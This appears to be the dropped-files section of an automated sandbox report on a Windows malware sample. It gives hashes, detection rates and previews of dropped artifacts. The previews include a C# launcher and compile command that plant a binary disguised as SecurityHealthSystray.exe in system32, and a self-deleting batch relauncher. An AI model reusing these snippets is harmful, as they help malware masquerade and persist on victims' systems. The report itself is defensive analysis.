                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                          Category:dropped
                                                                          Size (bytes):425
                                                                          Entropy (8bit):5.008873662349926
                                                                          Encrypted:false
                                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LW1etiLUliFkD:JNVQIbSfhV7TiFkMSfhWLW1eti4MFkD
                                                                          MD5:A2A5E7DFF9B0F316AB58858441C88881
                                                                          SHA1:77B530B5F856215D1A9B853F450686E838368E15
                                                                          SHA-256:A16F6FAFE0387DF0D91AA44392E010B35202C5984E4C53B4C662AF60A204F61C
                                                                          SHA-512:76E885E1514A778234F7625D99515E33581AD7A82CAEA2C9D43A6593DCCF1630815041CEFF477405B014FB4104AE4688824DC4ED50239F1C5CAEF27AF826188A
                                                                          Malicious:false
                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe"); } catch { } }).Start();. }.}.
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):250
                                                                          Entropy (8bit):5.119785597221396
                                                                          Encrypted:false
                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fQc5b:Hu7L//TRq79cQWfh5b
                                                                          MD5:46E84DEE6F2ABCBBA1E3CF4007E9ACC1
                                                                          SHA1:DB662C40CF07D78950F6D210C6A74515BEAF606F
                                                                          SHA-256:E3CCFE8641E25F16C46247F20D3700E5F0DE732253D246E8807FB15C9F42AEA7
                                                                          SHA-512:79B8D6F353852696DD4F24456223363A9080553AB3F8432FE0C9B984CD18800B0AE3B01E1E6E292A68DEAE8C3518569DACD7A7E3863186B0F6AD7325EA89F881
                                                                          Malicious:true
                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.0.cs"
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):750
                                                                          Entropy (8bit):5.266379800528901
                                                                          Encrypted:false
                                                                          SSDEEP:12:KJN/I/u7L//TRq79cQWfh5aKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfhcKax5DqBVKVrdFAw
                                                                          MD5:ADD1ADD1824A1746510EA458064A4B14
                                                                          SHA1:8D8B64B536B10F8444D4CF0102D78FD8B6011347
                                                                          SHA-256:36DDF2B509D39DD3D31A11F596C7B9B5588256FA520E25CAEDDAEC830ADD3339
                                                                          SHA-512:6389FF8080DB2EFE49D7D9D0E9AD0853694A938B681B6476CC84C53E9891656B97F969A690AE455EFC709CD15B0366D078E073D38EB1CEE92195DC3C00CDA3BF
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.323856189774723
                                                                          Encrypted:false
                                                                          SSDEEP:3:P4j/QNJd7yxNn:9T7un
                                                                          MD5:151C335721AC0E5FC4CBBF354CDE678F
                                                                          SHA1:F8CB0EC4BDF07E954391DE2E1A97E39B5660AF02
                                                                          SHA-256:B5D84CB53C7ED270315F7396C7BEAD2A20FF04FBA03AE20109E362EBEA2F58D1
                                                                          SHA-512:F72D5533EC6A1051381D2243ABE51D0C7D75B54FD2E4E5C2E2E7DBAFE58346BF6F82931EB5763780AC605F0E5408B19EDCD49717E20FB296E28BCE2FE3CE9235
                                                                          Malicious:false
                                                                          Preview:ikzuPjXfnCirpXtshlxayTWTh
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):5.209731392840133
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+WfW1JyzkAHyBktKcKZG1t+kiE2J5xAIJ7kh:hCRLuVFOOr+DE1wv+VyKOZG1wkn23fJe
                                                                          MD5:8205D0C6E15E3D0F9D18E15CB0407361
                                                                          SHA1:FD86F9BDB1457531FC79BECE633CBE0870006135
                                                                          SHA-256:1B26C0471694F2963D0CC8C476529D112C7DF15CD76B36E66D28A8BB85CAA805
                                                                          SHA-512:656D13FC29C192BF78F227AB75E0FC0337FE09FE724AD4CE2D2E67A3CCFE0F8FD84DB6F3CB31E079BC88CAFB7FD2EBED71198E0F99521860300970CEA8615BDC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\wA41hAKrBM.bat"
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.133660689688186
                                                                          Encrypted:false
                                                                          SSDEEP:3:ukU1Hn:ukU1H
                                                                          MD5:A66DEFFC688CB8BABB7D50ED04462472
                                                                          SHA1:D49E1F209B56010B53A6A441A770DFA4D74C5BA7
                                                                          SHA-256:AF18A0E816142666C24EFC59E721E6019C01C1C664EA530D9BC6385411772E49
                                                                          SHA-512:C2CA490A741FCB803C2281D9352C10BF3C34CA8E52F594CC9B7E3692BF8D4AA2EFBFF596835FA6DABCBA80F7546856985C878848E08CEADBBBEBE6D57BE9C8D8
                                                                          Malicious:false
                                                                          Preview:mvzkks8lNzJJAcc1IXrqvvLj5
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Joe Sandbox View:
                                                                          • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                                          • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                                          • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                                          • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                                          • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                                          • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                          • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                                          • Filename: onlysteal.exe, Detection: malicious, Browse
                                                                          • Filename: t8F7Ic986c.exe, Detection: malicious, Browse
                                                                          • Filename: 544WP3NHaP.exe, Detection: malicious, Browse
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (432), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):432
                                                                          Entropy (8bit):5.838829911265421
                                                                          Encrypted:false
                                                                          SSDEEP:12:8sQwarITUp4B+64lEOKVSTf5ZEqnjgpK6hUzctuj:9QwarITUG+iORfFjH6hUIK
                                                                          MD5:FB146BAA725A66AF14DD04C59ECE83E1
                                                                          SHA1:2E158D7DA392F637E285AD2DA3E3C046B05506DF
                                                                          SHA-256:DDCDF6FBEC6970C2994FE71249A284C94750401DB61D60201CE91A6432944B19
                                                                          SHA-512:934B01DEBE667DADA68D898F623245BE79919B6EE139D0D0254993ACD1202FD7C0037487B16A0AFE1CFD17BCBB5DAC38FE7AEAC870523BCBA6AB4C3362D68736
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):69632
                                                                          Entropy (8bit):5.932541123129161
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32256
                                                                          Entropy (8bit):5.631194486392901
                                                                          Encrypted:false
                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):85504
                                                                          Entropy (8bit):5.8769270258874755
                                                                          Encrypted:false
                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23552
                                                                          Entropy (8bit):5.519109060441589
                                                                          Encrypted:false
                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):40
                                                                          Entropy (8bit):4.784183719779189
                                                                          Encrypted:false
                                                                          SSDEEP:3:XNrIMkgKKzQu:XpxpKKD
                                                                          MD5:EF0EDA97D12D6902297C2FC4AA1DC19E
